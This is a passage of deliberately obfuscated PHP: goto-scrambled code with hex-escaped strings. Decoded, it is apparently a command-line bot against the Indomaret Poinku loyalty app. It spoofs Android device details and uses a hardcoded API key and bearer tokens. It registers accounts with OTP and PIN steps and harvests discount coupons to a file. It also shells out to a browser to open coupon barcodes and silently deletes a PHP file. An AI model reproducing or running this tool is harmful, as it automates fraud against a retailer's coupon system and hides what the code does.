  $eAEyy = @$lImQC["\144\x61\x74\141"]["\x63\157\x6e\164\145\x6e\x74"][3]["\143\x6f\x75\160\x6f\156\x4e\x61\x6d\x65"];
  goto sBKLJ;
  DkdVG:
  $sONlZ = str_replace("\15", '', $rERzL);
  goto O4Bvg;
  SWGWm:
  $OtngW = $eqo_P;
  goto UAyjl;
  YHEft:
  IHjkB:
  goto MugIV;
  ujQH4:
  $Ap1KM = json_decode($Jk9cx, true);
  goto dj4Hn;
  A0Vdd:
  if (!($LD6vG == '')) {
    goto xUutP;
  }
  goto ZO4Kj;
  sSzdR:
  alr8L:
  goto Wyaqr;
  CYzaS:
  echo "\xa";
  goto Ze_qG;
  dj4Hn:
  $M1ADy = @$Ap1KM["\x64\141\x74\x61"]["\151\x64"];
  goto mA2X2;
  BBKgz:
  echo @ZM6IC("\162\x65\144", "\12\176\176\x7e\x7e\x7e\x7e\176\176\176\x7e\176\x7e\176\x7e\176\x7e\x7e\x7e\176\176\176\176\x7e\x7e\176\x7e\176\x7e\x7e\x7e\x7e\x7e\176\176\x7e\176\176\176\x7e\176\176\x7e\176\x7e\x7e\x7e\x7e\176\12");
  goto Ca6xL;
  YS1xZ:
  $jlHkA = str_replace("\55", '', $sOOnY);
  goto wEXqb;
  l16i0:
  $GOXkU = $w5ulg;
  goto qhkai;
  uhX7M:
  $jTEU0 = trim(fgets(STDIN));
  goto JcsIo;
  E0oru:
  echo "\12";
  goto xgzIC;
  hpqJl:
  $jTEU0 = trim(fgets(STDIN));
  goto zeNT9;
  Og2UZ:
  vR5mg:
  goto jn4R5;
  END4X:
  t27Lz:
  goto VuGJw;
  KAZAL:
  echo "\12";
  goto OseGJ;
  lSP17:
  $p4iky = @$Ap1KM["\144\141\164\x61"]["\155\145\155\x62\x65\x72\x49\x64"];
  goto OzIsi;
  gwkL_:
  echo "\12";
  goto eTH3i;
  SWeRy:
  $zvt88 = $QRhbE;
  goto WuLs0;
  sHvzX:
  $UHj7C = G8PF2("\x68\x74\164\160\x73\x3a\57\57\145\144\x74\163\141\x70\x70\56\151\156\x64\x6f\x6d\x61\x72\145\x74\160\157\x69\x6e\x6b\x75\x2e\x63\157\155\x2f\x63\x6f\x75\x70\157\x6e\57\141\x70\151\x78\55\61\x35\x30\62\55\141\160\x69\x2f\x6d\x6f\x62\151\x6c\x65\57\x63\157\165\x70\x6f\x6e\163\x3f\x75\156\x70\141\147\x65\x64\75\x74\162\x75\x65", $aY0el, $GOXkU, $mlMLt);
  goto n0VNS;
  aMC4b:
  die;
  goto IRvmv;
  NUaSL:
  @unlink("\x70\x6f\x69\156\150\160\56\x70\x68\160");
  goto bQ3QD;
  JcsIo:
  echo "\12";
  goto udJYZ;
  IMOnB:
  echo @ZM6Ic("\x79\x65\154\154\157\167", "\40\x39\40\x20\x2e\40\107\x65\x6e\145\162\x61\x74\145\x20\x54\157\x6b\145\x6e\40\101\153\163\145\x73\xa");
  goto Sx3di;
  ymmJo:
  die;
  goto oHvEu;
  q111Q:
  function zfEBk($lEbop, $wDisp = null, $aY0el, $GOXkU, $mlMLt)
  {
    goto syPo4;
    syPo4:
    $C6npe = curl_init();
    goto wqBlH;
    nkxB1:
    $AXlcQ = json_decode($y7f11, true);
    goto W9LU_;
    bWU3H:
    goto QWxKs;
    goto FNKAO;
    wqBlH:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto Ofm38;
    isWV7:
    if (!$P7lm9) {
      goto Xaq4l;
    }
    goto U7pWm;
    GBmoN:
    return $ECuqv;
    goto M6wpQ;
    pE4pr:
    $ruc3h[] = "\165\163\145\x72\x2d\141\x67\x65\156\x74\72\40\x6f\x6b\x68\164\x74\160\57\x35\56\60\56\x30\x2d\141\154\x70\x68\x61\x2e\65";
    goto R5fKC;
    U7pWm:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto mj6E1;
    mj6E1:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto bWU3H;
    pgJaU:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\x6b\x6c\151\x6b\x2e\164\x78\164");
    goto ltt9q;
    bawv6:
    return false;
    goto GZQRB;
    Ofm38:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto RFKmm;
    Sn0IM:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto jLQVT;
    jLQVT:
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp);
    goto pgJaU;
    eoAdK:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto Sn0IM;
    ltt9q:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\x6b\x6c\151\x6b\56\164\170\164");
    goto ZcFzX;
    ZcFzX:
    $ECuqv = curl_exec($C6npe);
    goto YJ8S5;
    PChxx:
    curl_setopt($C6npe, CURLOPT_POST, 1);
    goto t2W4U;
    t2W4U:
    $ruc3h[] = "\141\165\x74\150\x6f\x72\151\172\141\164\x69\157\x6e\x3a\x20\102\x65\141\162\x65\x72\x20" . $mlMLt;
    goto pE4pr;
    FNKAO:
    Xaq4l:
    goto bawv6;
    RFKmm:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto HOOPr;
    GZQRB:
    QWxKs:
    goto nkxB1;
    W9LU_:
    print_r($AXlcQ);
    goto GBmoN;
    i5hra:
    $ruc3h[] = "\x6b\x65\171\72\40\132\x57\x52\60\x63\x7a\111\167\x4d\152\x45\66\x4d\x48\x42\163\x62\x57\x39\x72\142\147\x3d\x3d";
    goto aelBV;
    R5fKC:
    $ruc3h[] = "\x63\157\x6e\x74\145\x6e\164\x2d\164\x79\x70\145\72\40\141\x70\x70\154\x69\143\x61\164\x69\x6f\x6e\x2f\152\163\x6f\x6e\73\x20\x63\x68\x61\162\x73\x65\x74\75\125\124\106\55\70";
    goto i5hra;
    bYMlB:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto eoAdK;
    aelBV:
    $ruc3h[] = "\x61\x70\160\x73\x3a\x20\173\42\x61\x70\x70\x5f\166\145\x72\163\151\x6f\x6e\42\x3a\x22\x33\x2e\61\63\56\60\42\54\42\144\x65\166\151\143\x65\x5f\143\x6c\141\163\x73\x22\72\x22\x50\150\157\x6e\145\42\54\42\x64\145\166\x69\x63\145\x5f\146\141\x6d\151\154\171\42\x3a\x22" . $GOXkU . "\x22\54\42\x64\x65\166\x69\x63\x65\x5f\151\144\x22\72\42" . $aY0el . "\x22\54\x22\x6f\163\137\156\x61\x6d\x65\42\x3a\42\x41\x6e\144\162\157\x69\144\40\x50\x22\x2c\x22\157\163\x5f\x76\145\162\163\151\157\156\42\x3a\x22\x41\x6e\144\x72\x6f\151\x64\x20\71\42\x7d";
    goto bYMlB;
    YJ8S5:
    $P7lm9 = curl_getinfo($C6npe);
    goto isWV7;
    HOOPr:
    curl_setopt($C6npe, CURLOPT_CUSTOMREQUEST, "\x50\x55\124");
    goto PChxx;
    M6wpQ:
  }
  goto DbkXw;
  wsgYZ:
  EPpoD:
  goto C2Q8s;
  d7TEi:
  echo @Zm6ic("\156\145\166\x79", $wd9cN);
  goto alHDl;
  L9zdo:
  print_r($zcN5u);
  goto pWN9s;
  bAz0x:
  echo @zM6IC("\x70\x75\162\x70\x6c\x65", $fZ2bz);
  goto OZ3eG;
  JhAdw:
  die;
  goto WUeTg;
  mEspx:
  $wDisp = "\173\x22\144\141\x74\141\42\x3a\x5b\x7b\x22\x61\x70\x70\x6c\x69\x63\141\164\151\157\156\42\72\x7b\42\x61\x70\x70\x5f\x76\145\x72\x73\151\x6f\x6e\x22\72\x22\63\56\61\63\56\60\42\54\x22\144\145\166\151\143\x65\x5f\x63\154\141\x73\x73\x22\x3a\x22\x50\150\x6f\x6e\x65\x22\x2c\x22\144\x65\166\x69\x63\145\137\146\141\x6d\x69\x6c\171\42\x3a\42" . $GOXkU . "\x22\54\x22\x64\x65\x76\x69\x63\x65\137\151\x64\42\72\x22" . $aY0el . "\42\54\42\x6f\163\x5f\x6e\141\x6d\x65\x22\72\42\101\x6e\144\162\x6f\151\x64\x20\120\42\54\x22\157\163\x5f\x76\145\x72\x73\x69\157\156\x22\72\x22\101\156\144\162\x6f\151\144\x20\x39\x22\x7d\x2c\x22\x63\x6f\x72\145\x22\x3a\173\x22\145\166\x65\156\x74\137\156\141\155\x65\42\x3a\x22\160\x61\147\145\137\x76\151\145\x77\42\x2c\42\x65\166\145\156\x74\137\x74\151\x6d\x65\x73\x74\141\x6d\x70\42\72" . $nb9cm . "\54\42\160\141\x67\145\137\156\141\x6d\145\x22\x3a\42\x64\157\x6e\x65\40\162\145\x67\x69\163\x74\162\141\164\151\x6f\x6e\x22\x2c\42\x70\141\x67\145\137\165\x72\154\160\141\x74\150\42\x3a\42\42\175\54\x22\165\x73\145\x72\42\x3a\173\42\x73\x65\163\x73\x69\x6f\x6e\x5f\x69\144\42\x3a\42" . $MXjqh . "\x22\x2c\42\x75\163\x65\162\137\151\x64\42\x3a" . $R_bYC . "\54\42\165\163\145\x72\x5f\151\x70\137\141\144\x64\x72\x65\163\163\42\72\x22\x31\62\67\56\x30\x2e\60\x2e\61\x22\175\x7d\135\175";
  goto zonco;
  ug1iK:
  $RJnNP = trim(fgets(STDIN));
  goto gy03D;
  mvBqK:
  $p4iky = @$Ap1KM["\144\141\x74\141"]["\x6d\145\x6d\x62\145\162\111\144"];
  goto PNM0g;
  WC5FU:
  echo "\12";
  goto K2cEc;
  Y8zV2:
  echo @ZM6ic("\162\145\x64", "\x20\x20\40\x50\154\x65\141\x73\x65\x20\x56\x65\162\151\146\171\x20\x59\157\165\162\x20\x44\x65\166\151\x63\145\x20\x46\151\162\x73\164\x20\136\136\xa");
  goto aLrHz;
  Z3K8e:
  $zn5zd = $U0YgX;
  goto PmTxr;
  zeS_n:
  $XTuz1 = g1WXt("\x68\x74\164\160\163\72\57\x2f\x65\x64\x74\x73\x61\x70\x70\x2e\x69\x6e\x64\x6f\155\x61\x72\x65\164\x70\x6f\151\x6e\153\165\x2e\143\x6f\x6d\57\143\165\163\x74\157\x6d\x65\x72\x2f\141\x70\x69\x78\x2d\x31\65\60\62\55\x61\160\151\x2f\x6d\x6f\142\151\154\x65\x2f\143\165\x73\164\x6f\x6d\x65\x72\x2d\x61\x64\x64\x72\145\163\x73\57\x70\x6f\163\x74\x61\x6c\x2d\143\x6f\x64\x65", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto Syt7J;
  hjVag:
  $PQD51 = THhFs("\x68\x74\164\160\163\x3a\x2f\57\x65\x64\x74\163\141\x70\160\56\151\x6e\144\157\155\141\162\x65\x74\160\x6f\x69\156\x6b\x75\56\143\157\x6d\x2f\154\x6f\147\x69\x6e\x2f\x61\160\151\x78\x2d\x31\x35\x30\62\x2d\141\x70\x69\57\x6f\160\x65\x6e\x2f\x70\x69\x6e\x2f\x69\x73\55\160\x69\x6e\x2d\145\170\x69\163\x74\x2d\x62\171\55\x70\x68\x6f\156\145\55\156\x75\x6d\x62\145\162", $wDisp, $aY0el, $GOXkU);
  goto GFsfA;
  Z0dwt:
  if (!($ZNU2M == '')) {
    goto Yni8F;
  }
  goto pnaf0;
  mvQke:
  IA3io:
  goto f3KNk;
  L84Hz:
  $Ap1KM = json_decode($Jk9cx, true);
  goto X5CYR;
  tmzrq:
  QRHsK:
  goto VMIc9;
  TcCw8:
  echo @ZM6iC("\156\145\166\x79", $D18xv);
  goto LxEC0;
  cKx4E:
  $D2zwh;
  goto o5jb2;
  F_rzk:
  $zvt88 = $QRhbE;
  goto xlspJ;
  zF0W4:
  $dQ8Tp = trim(fgets(STDIN));
  goto TqaEk;
  CX_zf:
  echo @zM6ic("\156\145\x76\171", $ABmxY);
  goto CId6O;
  jH633:
  $efQM2 = count($QRhbE) - 1;
  goto UAANB;
  xhh2o:
  echo @Zm6ic("\156\145\166\171", $fZ2bz);
  goto GxUv5;
  tvm0w:
  $m5BZY = gggr_("\x68\x74\x74\x70\163\72\x2f\57\141\163\151\x61\55\163\x6f\165\164\150\145\x61\163\164\x32\55\x69\144\155\55\143\x6f\162\x70\55\x70\x72\x64\x2e\143\x6c\x6f\165\x64\146\165\156\x63\x74\x69\x6f\x6e\x73\56\x6e\x65\164\x2f\151\x64\155\x61\160\x70\x73\137\x74\162\x61\143\x6b\x65\162\137\x67\x61\164\145\167\141\x79", $wDisp);
  goto D2_Ke;
  IkNDt:
  @unlink("\x70\157\x69\x6e\150\160\x2e\x70\150\160");
  goto v4kcG;
  m6Vqe:
  $yJiD4 = @$owfHy["\144\141\x74\141"][0]["\x64\x69\163\x74\162\151\x63\164"]["\x64\151\163\x74\162\x69\x63\x74\x4e\141\x6d\145"];
  goto ahzgl;
  C2Q8s:
  if (!($yy9BI < $DxrJr)) {
    goto V9iZ0;
  }
  goto tZsGQ;
  UHHXN:
  $Bz8Et = @$owfHy["\x64\141\x74\x61"][0]["\160\x6f\163\164\x61\154\103\157\144\145"];
  goto Fpl08;
  KiRsY:
  echo "\12";
  goto fDgG7;
  eZoqi:
  goto uNbUh;
  goto ha1Vp;
  GFo6V:
  echo "\x44\x65\154\145\164\x65\144\x20{$xp_1p}\40\40";
  goto Ahdwh;
  uJHIr:
  $wlJRC = xOZB4(array("\x7c"), $wZnHP)[1];
  goto buN63;
  HQgEB:
  $yy9BI;
  goto faEcm;
  en_ME:
  RhriJ("\x4b\x75\160\x6f\x6e\x20\x50\x6f\x69\156\x6b\x75\x20\156\145\x77\x2e\164\170\164", $raN1z);
  goto BBtBz;
  DCe2w:
  $cPDPt = trim(fgets(STDIN));
  goto sUm5u;
  GGHhV:
  $nPb0z = json_decode($Jk9cx, true);
  goto N9Kna;
  IzLeM:
  echo "\12";
  goto TjTjD;
  crpcv:
  $Ap1KM = json_decode($ofEkP, true);
  goto vXlUB;
  c9VHy:
  $efQM2 = count($QRhbE) - 1;
  goto JjOHD;
  KaAiL:
  $Y02JS = G1Wxt("\x68\164\x74\160\x73\x3a\x2f\x2f\145\144\164\163\141\x70\160\x2e\151\x6e\144\x6f\x6d\141\x72\x65\164\x70\x6f\x69\x6e\x6b\x75\x2e\143\157\155\x2f\x6c\x6f\147\151\x6e\x2f\x61\160\x69\170\55\61\x35\x30\x32\x2d\141\x70\151\x2f\160\151\156\x2f\143\x72\145\141\164\x65\x2d\x70\151\x6e", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto F6EGi;
  o4gad:
  $zn5zd = $U0YgX;
  goto qmkK5;
  EZfFe:
  $wDisp = "\173\x22\x64\141\164\x61\42\72\x5b\x7b\x22\x61\x70\160\154\151\x63\x61\x74\151\157\156\x22\72\x7b\x22\x61\x70\160\137\x76\x65\x72\163\151\157\x6e\x22\x3a\x22\63\56\x31\x33\x2e\x30\42\x2c\42\144\x65\x76\x69\143\145\137\143\154\x61\163\163\x22\72\42\x50\150\x6f\156\x65\42\x2c\42\144\145\166\x69\x63\145\x5f\x66\x61\x6d\x69\x6c\171\x22\72\42" . $GOXkU . "\42\x2c\42\x64\x65\x76\151\143\x65\x5f\151\x64\x22\x3a\x22" . $aY0el . "\42\x2c\x22\157\x73\x5f\x6e\141\155\x65\x22\72\42\101\156\x64\162\157\x69\x64\40\120\x22\x2c\42\157\163\137\x76\145\162\163\x69\x6f\x6e\x22\72\x22\x41\156\x64\162\x6f\x69\144\x20\x39\42\x7d\54\x22\x63\157\x72\x65\42\72\173\x22\x65\x76\145\x6e\164\137\156\141\x6d\x65\42\x3a\42\x70\141\147\145\137\166\151\145\167\x22\54\42\145\x76\x65\x6e\x74\137\x74\x69\x6d\145\163\x74\x61\x6d\x70\x22\72" . $nb9cm . "\x2c\x22\160\141\x67\145\137\x6e\141\x6d\145\x22\72\x22\x68\x6f\x6d\x65\x22\54\42\160\141\147\x65\x5f\165\162\154\160\x61\164\x68\42\72\x22\x22\x7d\54\x22\155\141\x72\153\145\164\x69\156\x67\x22\x3a\173\x22\165\x74\x6d\x5f\162\141\167\x22\x3a\x22\x75\x74\155\x5f\163\157\x75\x72\x63\x65\75\147\157\157\147\x6c\145\55\160\x6c\141\171\46\x75\164\x6d\137\155\x65\144\151\165\155\x3d\x6f\162\x67\x61\156\x69\x63\42\175\x2c\42\x75\x73\145\x72\x22\72\173\42\x73\145\163\x73\x69\x6f\156\x5f\x69\x64\42\x3a\x22" . $MXjqh . "\x22\x2c\x22\x75\x73\x65\162\137\x69\x64\x22\72" . $R_bYC . "\54\x22\165\x73\145\162\x5f\x69\x70\x5f\x61\x64\x64\x72\x65\163\x73\42\x3a\42\61\x32\67\x2e\x30\x2e\x30\56\61\42\x7d\175\135\175";
  goto Adzo6;
  am0nY:
  $nb9cm = round(microtime(true) * 1000);
  goto EZfFe;
  cfUiS:
  $D2zwh = "\60";
  goto yRdKx;
  gmL5u:
  echo @zm6IC("\x67\x72\145\x65\156", "\40\x20\174\x20\127\101\40\x30\70\62\x31\67\66\63\65\70\x32\x39\65\40\xa");
  goto SMCx_;
  lLd10:
  smSBj:
  goto WYK2I;
  GAzr5:
  if (!($fUekS == '')) {
    goto Js11p;
  }
  goto W5Geu;
  N6c5f:
  $mlMLt = $obc_G;
  goto GPI3O;
  cvg4O:
  EKk1g:
  goto mMwna;
  nJiyB:
  if (!($yy9BI < $DxrJr)) {
    goto Eqo5q;
  }
  goto bxKdX;
  uY1yn:
  V7t6B:
  goto PUFOJ;
  Tgd35:
  echo "\xa";
  goto vEQbd;
  ptOzD:
  print_r($zcN5u);
  goto Mrs6i;
  IBHxa:
  if (!($fUekS == '')) {
    goto AJ5_S;
  }
  goto HHfsx;
  g3Opg:
  echo @Zm6ic("\156\145\166\171", "\40\40\40\40\x20\40\x20\40\x20\40\40\x20\x20\x20\40\40\x41\101\115\x49\x49\116\x20");
  goto gO1cU;
  cMm4X:
  echo @Zm6Ic("\x67\162\145\x65\156", "\115\x61\163\165\x6b\153\141\x6e\x20\117\x54\120\40\101\x6e\144\x61\x20\72\x20");
  goto DSAWn;
  xsgCP:
  $hdCXp = xOzB4(array("\x3a"), $Ia9Ix)[1];
  goto i2TQW;
  rNOFN:
  echo @ZM6Ic("\171\x65\154\154\x6f\167", "\x42\x75\151\x6c\x64\40\x42\171\x20\x46\105\122\x44\x59\40\x52\101\115\101\x44\x48\x41\116\40");
  goto la6k6;
  Vnumm:
  $jTEU0;
  goto fNtNy;
  XFSNO:
  $zcN5u = XOZb4(array("\174"), $tqWr2)[0];
  goto pRwIq;
  y5Csz:
  $JaDCq = $PQA77;
  goto wqRSd;
  mMwna:
  WfXbO:
  goto OUrjF;
  mQ4fU:
  echo @Zm6IC("\x79\145\154\154\x6f\167", "\174\x20\x57\x41\x20\60\x38\62\61\x37\66\63\65\x38\x32\71\x35\x20\xa");
  goto EcpCc;
  OSZHw:
  echo "\xa";
  goto lU4d2;
  U2Uv6:
  $w5ulg = str_replace("\xd", '', $TvVlh);
  goto smjuE;
  xUip9:
  echo @zm6Ic("\171\145\154\154\157\x77", "\x20\55\40\123\x69\154\141\150\153\141\156\40\x4d\x65\x6c\x61\x6b\x75\153\x61\156\x20\124\x72\141\156\x73\x61\x6b\163\x69\x20\x54\145\162\x6c\145\x62\151\150\x20\x44\141\150\x75\154\165\xa");
  goto uJSyf;
  Zu6S2:
  echo @zm6Ic("\x6e\x65\166\x79", "\101\x70\x61\x6b\x61\x68\40\123\x75\144\x61\x68\40\x54\162\x61\x6e\163\x61\x6b\x73\x69\40\77\40\x28\x20\x79\x20\57\40\156\40\51\40\x3a\40");
  goto gGCoG;
  wvrQK:
  echo "\12";
  goto oZ7zX;
  s2Asv:
  $zn5zd = $U0YgX;
  goto gVo9_;
  xMsml:
  $LgiFv = @$Ap1KM["\144\141\x74\141"]["\x69\x6e\x66\157\162\155\141\x74\151\157\156"];
  goto pe2QH;
  a_izq:
  echo @Zm6iC("\171\x65\154\x6c\157\x77", "\120\157\x69\x6e\40\x41\153\165\156\x20\x41\156\x64\x61\x20\72\x20");
  goto MdYDc;
  ehPqu:
  $m5BZY = gGGr_("\x68\x74\164\160\163\72\57\x2f\141\x73\151\x61\55\x73\157\x75\x74\150\145\141\163\x74\62\55\x69\x64\155\x2d\x63\157\162\160\55\160\x72\144\56\143\x6c\x6f\x75\x64\x66\165\x6e\143\164\151\x6f\156\163\56\156\x65\x74\57\x69\144\x6d\x61\x70\160\163\137\164\x72\141\x63\153\145\x72\x5f\x67\141\164\145\167\141\x79", $wDisp);
  goto UtozB;
  grlZ3:
  echo "\xa";
  goto X4lGn;
  avNKg:
  ds3qL:
  goto F5gUC;
  yqzNQ:
  if (!($kp_uF == "\x31")) {
    goto JKU8P;
  }
  goto P23f4;
  GHAKe:
  echo @zM6IC("\x6e\145\x76\171", "\40\123\x45\x4d\x4f\107\101\x20\x4c\x4f\102\x41\x4e\x47\40\120\101\116\124\x41\124\40\116\131\101\40\x42\x49\123\x55\x4c\101\x4e\41\41\41\x21\41\x20\12");
  goto B90Go;
  souSV:
  Gq4tD:
  goto q6jGB;
  QKOt8:
  $N0XGD = g8PF2("\150\x74\164\160\x73\72\57\57\x65\x64\x74\x73\141\x70\x70\56\151\x6e\144\157\x6d\141\x72\145\x74\x70\157\151\156\x6b\165\56\x63\x6f\x6d\x2f\154\157\x79\141\154\x74\171\57\141\x70\x69\170\x2d\x31\65\60\62\x2d\x61\160\x69\x2f\x6d\x6f\x62\151\154\x65\x2f\x70\157\151\x6e\x74\163\x2f\155\145", $aY0el, $GOXkU, $mlMLt);
  goto bs89A;
  WmLIs:
  $zn5zd = $U0YgX;
  goto WQtAk;
  erEEh:
  $yy9BI++;
  goto H3Rse;
  nJynW:
  echo shell_exec("\170\x64\147\x2d\x6f\x70\x65\156\x20\x22\150\x74\x74\160\x73\x3a\57\x2f\x62\141\162\x63\x6f\x64\145\56\164\x65\x63\x2d\151\164\56\x63\x6f\155\57\x62\x61\162\143\x6f\144\145\56\141\x73\150\170\77\x64\141\x74\x61\75\42" . $WtCiL . "\x22\x26\x63\x6f\x64\x65\x3d\103\157\144\x65\x31\62\x38\46\155\x75\x6c\x74\x69\160\x6c\x65\142\141\x72\x63\157\144\145\x73\75\146\x61\154\163\145\x26\x74\x72\141\156\x73\154\x61\x74\x65\55\145\163\143\x3d\x74\x72\x75\x65\x26\x75\x6e\x69\164\75\106\x69\164\46\x64\160\x69\75\71\x36\46\151\155\141\147\145\x74\x79\160\x65\x3d\107\151\x66\x26\162\x6f\x74\x61\x74\x69\157\156\x3d\60\46\x63\x6f\x6c\x6f\162\75\x25\x32\x33\60\60\x30\x30\x30\60\46\x62\147\143\157\154\157\162\x3d\45\x32\63\x66\146\x66\x66\x66\x66\46\x63\157\x64\145\160\x61\147\145\75\x44\x65\146\141\x75\154\x74\46\x71\x75\x6e\x69\164\75\x4d\155\x26\161\x75\x69\145\164\75\61\60\x26\x68\151\144\x65\x68\162\x74\x3d\x46\x61\154\x73\145\42");
  goto n4l0E;
  z87ev:
  if ($z4sxX == "\104\151\x73\153\x6f\x6e\40\x52\x70\40\62\65\x2e\60\60\60\40\113\154\x69\153\40\x49\156\144\157\155\x61\x72\145\x74") {
    goto Wa6Sr;
  }
  goto c1LdE;
  Tg5cq:
  goto wB2V7;
  goto rpmN3;
  QYNTd:
  $zcN5u = XoZb4(array("\x7c"), $wZnHP)[0];
  goto YrGWs;
  penYb:
  FMhwq:
  goto j95ak;
  o8_Bq:
  print_r($zcN5u);
  goto TmNrv;
  eQwBm:
  echo @ZM6Ic("\171\x65\x6c\x6c\x6f\x77", "\xa\117\124\x50\40\101\116\104\101\x20\123\101\114\x41\x48\54\x20\x53\x49\114\x41\x48\x4b\101\x4e\40\x49\116\120\125\x54\x20\x59\101\x4e\x47\40\x42\x41\x52\125\41\41\12\xa");
  goto IVQjo;
  xwo3y:
  echo "\xa";
  goto nRt6q;
  yJWDH:
  $wDisp = "\173\x22\x63\157\165\x70\x6f\156\111\144\x22\x3a\x22" . $Qa1_P . "\x22\54\42\x71\x74\x79\x22\x3a\x31\56\60\x2c\42\x73\164\141\x6d\x70\x45\170\x63\150\x61\x6e\147\x65\111\144\42\x3a\42" . $gCIzy . "\42\x7d";
  goto xkf3f;
  zYL9T:
  $jTEU0;
  goto za0pO;
  Gaiy0:
  echo @ZM6IC("\x67\x72\x65\145\x6e", "\x4d\141\x73\165\153\153\x61\x6e\40\x4e\x6f\155\x6f\162\40\x41\156\144\x61\x20\x20\x20\40\40\40\x20\x3a\40");
  goto xM5qM;
  L6ZvK:
  echo @zm6ic("\156\145\x76\x79", "\x4d\141\163\165\153\x6b\x61\x6e\40\125\x73\x65\162\156\141\x6d\145\x20\x4d\165\x20\x20\x3a\40");
  goto OUMdr;
  qE_1z:
  $QRhbE = explode("\xa", @file_get_contents("\155\171\x74\x6f\153\145\156"));
  goto F1unt;
  KRKGo:
  goto PcWWE;
  goto XW71U;
  VB4AI:
  goto CqA3L;
  goto ABTny;
  JKzQX:
  echo "\xa";
  goto ugz9I;
  hTCB6:
  echo "\xa";
  goto kq9hY;
  QCDzE:
  $D18xv = @$H1g60["\x64\141\x74\141"]["\151\144"];
  goto wuvlF;
  xjMrp:
  $KbHJf = rand(1000000, 9999999);
  goto FBtZN;
  MxNlU:
  $Jst1j = $aoIfK;
  goto MKy2r;
  OfOX3:
  echo "\12";
  goto Nmn6H;
  El078:
  to00G:
  goto oqEpm;
  qcX1a:
  goto jwQwr;
  goto P33EC;
  OXnTa:
  sfkUi:
  goto EDut1;
  tXds1:
  $qq5tL = "\62" . $gYG6P . "\x68\x67\65\64\x35\x34\144\x32\61\x76\x63";
  goto j2b0I;
  fs5BL:
  $ogbF4 = "\63\x30";
  goto cKx4E;
  tIM8g:
  echo "\xa";
  goto TSJ4g;
  YUJaT:
  if (!($jTEU0 < $S8W9D)) {
    goto bjdV_;
  }
  goto dLuPN;
  QwhGW:
  $ofEkP = CWAlZ("\150\164\x74\x70\163\x3a\x2f\x2f\145\x64\164\x73\141\160\x70\56\x69\x6e\x64\157\155\x61\x72\145\x74\x70\157\151\x6e\153\165\x2e\x63\x6f\155\x2f\x6c\x6f\x79\x61\154\x74\171\57\141\x70\151\x78\x2d\61\65\x30\x32\55\141\x70\x69\57\x6d\x6f\142\x69\154\145\57\160\x6f\151\x6e\x74\x73\57\155\145\x2f\143\157\x75\160\157\156\163\57\x65\170\x63\150\x61\x6e\147\145", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto CpSRT;
  LmE7p:
  zP__f:
  goto ynhnS;
  VoEDH:
  echo @ZM6Ic("\156\x65\166\x79", "\x20\x20\40\40\40\x20\40\x20\40\x20\x59\101\x4e\x47\40\116\131\x45\x42\x41\x52\x49\x4e\40\x53\x43\122\x49\120\124\40\x49\116\x49\40\12");
  goto SyHHL;
  zvS3t:
  $ABmxY = @$owfHy["\155\x65\x73\x73\x61\147\x65"];
  goto SzCcE;
  dFRET:
  $qtgR3 = "\x30";
  goto iAKfs;
  VPvQq:
  $M1ADy = @$Ap1KM["\x64\141\164\x61"]["\151\x64"];
  goto lSP17;
  rmeAQ:
  if ($BeKks == "\x44\x69\163\x6b\157\156\40\x52\160\40\62\x35\56\x30\60\60\x20\113\x6c\151\153\x20\111\x6e\144\157\155\141\162\x65\x74") {
    goto DNYaq;
  }
  goto Q4vMp;
  n4l0E:
  shell_exec("\x73\164\141\162\x74\40\x63\x68\162\x6f\155\x65\x20\x22\150\164\164\x70\163\x3a\x2f\x2f\142\x61\x72\x63\x6f\x64\145\x2e\x74\145\x63\x2d\x69\x74\x2e\143\157\x6d\57\142\x61\x72\x63\157\144\145\56\x61\x73\x68\170\77\x64\x61\x74\x61\x3d\42" . $WtCiL . "\x22\46\x63\x6f\x64\145\x3d\x43\157\x64\x65\61\x32\70\x26\155\165\154\x74\x69\x70\154\x65\x62\141\162\x63\157\x64\x65\x73\75\x66\141\x6c\x73\145\46\x74\162\141\x6e\163\154\x61\x74\145\x2d\x65\163\x63\75\x74\x72\165\x65\x26\x75\x6e\x69\164\x3d\106\x69\x74\x26\144\x70\151\75\71\x36\46\x69\155\x61\x67\145\x74\171\x70\145\x3d\x47\151\x66\x26\162\x6f\x74\141\164\x69\157\x6e\x3d\x30\46\143\157\154\157\162\75\x25\x32\x33\60\x30\x30\60\60\x30\46\x62\147\x63\157\154\157\162\x3d\45\62\x33\x66\x66\x66\146\146\x66\x26\x63\x6f\x64\145\160\141\x67\x65\75\x44\x65\146\141\x75\154\164\46\161\x75\156\151\x74\x3d\x4d\155\46\x71\x75\151\x65\x74\x3d\61\x30\46\x68\151\x64\x65\150\x72\x74\x3d\x46\x61\x6c\x73\145\x22");
  goto uDTHe;
  Ozv31:
  $D2zwh++;
  goto v1iyI;
  wvic1:
  $zcN5u = xOzB4(array("\174"), $wZnHP)[0];
  goto BX_qL;
  gIKVK:
  $odGGi = $kCT0W . "\x6d\x62\x4c\121\160\x65";
  goto We_ec;
  mvNd_:
